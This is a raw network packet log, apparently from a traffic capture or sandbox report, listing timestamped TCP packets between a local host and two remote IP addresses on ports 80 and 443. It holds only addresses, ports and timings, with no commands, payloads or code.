                                                          Dec 24, 2024 02:18:18.921102047 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.923597097 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.923811913 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.923863888 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.926120043 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.926337957 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.926387072 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.928777933 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.929001093 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.929045916 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.931405067 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.931611061 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.931655884 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.934031010 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.934262037 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.934313059 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.936278105 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.936470985 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.936532021 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.938497066 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.938704967 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.938760042 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.940660000 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.940870047 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.940916061 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.942853928 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.943063021 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.943111897 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.945017099 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.945256948 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.945303917 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.947959900 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.948328018 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.948374033 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.949290037 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.949609041 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.949670076 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.951456070 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.951683998 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.951729059 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.953640938 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.953834057 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.953883886 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.955790997 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.955933094 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.955990076 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.962356091 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.962553024 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.962601900 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.963340998 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.963747978 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.963816881 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.963963032 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.965841055 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.965893030 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.966052055 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.967961073 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.968012094 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.968116999 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.969990015 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.970041990 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.970194101 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.972090960 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.972135067 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.972270966 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.974087000 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.974136114 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.974283934 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.976084948 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.976135969 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.976305962 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.978029013 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.978071928 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.978223085 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.979975939 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.980024099 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.980179071 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.981892109 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.981935024 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.982095957 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.983757019 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.983802080 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.983978033 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.985666037 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.985706091 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.985857964 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.987502098 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.987559080 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.987713099 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.989362001 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.989408970 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.989567041 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.991168976 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.991225958 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.991321087 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.992923021 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.993002892 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.993140936 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.994705915 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.994769096 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.994916916 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.996488094 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.996548891 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.996701956 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.998182058 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:18.998231888 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:18.998353004 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.069598913 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.069654942 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.069802046 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.070198059 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.070267916 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.070611000 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.071049929 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.071104050 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.071384907 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.071929932 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.071980953 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.072161913 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.072864056 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.072920084 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.073054075 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.073771954 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.073811054 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.073952913 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.074744940 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.074799061 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.074908018 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.075562000 CET8049708147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.075619936 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.202276945 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.220220089 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.220263004 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:19.221654892 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.225915909 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.225930929 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:19.227730989 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.227761984 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:19.227844954 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.228641987 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.230309010 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:19.230336905 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:19.348148108 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:19.349601984 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.362927914 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:19.482378960 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:20.244647980 CET4970880192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:20.276602983 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.276652098 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.276706934 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.277910948 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.277921915 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.445450068 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.445539951 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.445945024 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.446007967 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.456887960 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.456904888 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.457185030 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.459423065 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.459445000 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.460382938 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:20.506712914 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.506715059 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:20.609555960 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:20.609700918 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:20.609776020 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.166004896 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.166023970 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.166146994 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.175843000 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.175873041 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.176100969 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.301177979 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.420639038 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.489247084 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.489322901 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.491626978 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.491633892 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.491868019 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.557689905 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.557725906 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.557807922 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.702497005 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.702708960 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.702721119 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.702760935 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.703495979 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.703506947 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.703548908 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.704370975 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.704389095 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.704423904 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.705244064 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.705256939 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.705295086 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.710906982 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.710952044 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.711113930 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.720326900 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.720381975 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.822305918 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.822474003 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.822523117 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.826459885 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.894619942 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.894668102 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.894798994 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.897022009 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.897067070 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.897383928 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.905030966 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.905081987 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.905258894 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.913144112 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.913197994 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.913229942 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.915306091 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.915431976 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.915476084 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.919712067 CET49709443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.919729948 CET44349709172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.921082973 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.921125889 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.921597004 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.929162025 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.929205894 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.929389954 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.930710077 CET49714443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.930746078 CET44349714172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.930809975 CET49714443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.931190014 CET49714443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.931204081 CET44349714172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.936896086 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.936989069 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.937033892 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.937161922 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.937206030 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.937236071 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.937247038 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.937258959 CET49710443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.937263966 CET44349710172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.937453985 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.945101976 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.945147038 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.945219994 CET49715443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.945259094 CET44349715172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.945307970 CET49715443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.945316076 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.945708990 CET49715443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:21.945723057 CET44349715172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:21.953063965 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.953104019 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.953298092 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.961406946 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.961417913 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.961456060 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.971530914 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.971575975 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.971611977 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.975347996 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.975399971 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:21.983568907 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.983972073 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:21.984014988 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.024548054 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.144012928 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.256449938 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:22.256546021 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:22.256853104 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:22.256853104 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:22.256962061 CET49712443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:22.256974936 CET44349712172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:22.264909983 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:22.264955997 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:22.265340090 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:22.265340090 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:22.265372992 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:22.425848007 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.425863981 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.428210974 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.428222895 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.428577900 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.428586960 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.432745934 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.432759047 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.437201023 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.437212944 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.437233925 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.437511921 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.441448927 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.441461086 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.445518017 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.445796013 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.445808887 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.449517012 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.450160027 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.450171947 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.453512907 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.454520941 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.454531908 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.454663038 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.458888054 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.458923101 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.458951950 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.463219881 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.463254929 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.463341951 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.467645884 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.467680931 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.467706919 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.471932888 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.471967936 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.472706079 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.476301908 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.476336956 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.476356030 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.480398893 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.480453968 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.480654955 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.484946966 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.484988928 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.485002041 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.489120960 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.489190102 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.489547014 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.493602037 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.493618965 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.493680000 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.497991085 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.498008966 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.498132944 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.502307892 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.502326965 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.502347946 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.596434116 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.618140936 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.618159056 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.618252993 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.619788885 CET8049711147.45.44.131192.168.2.8
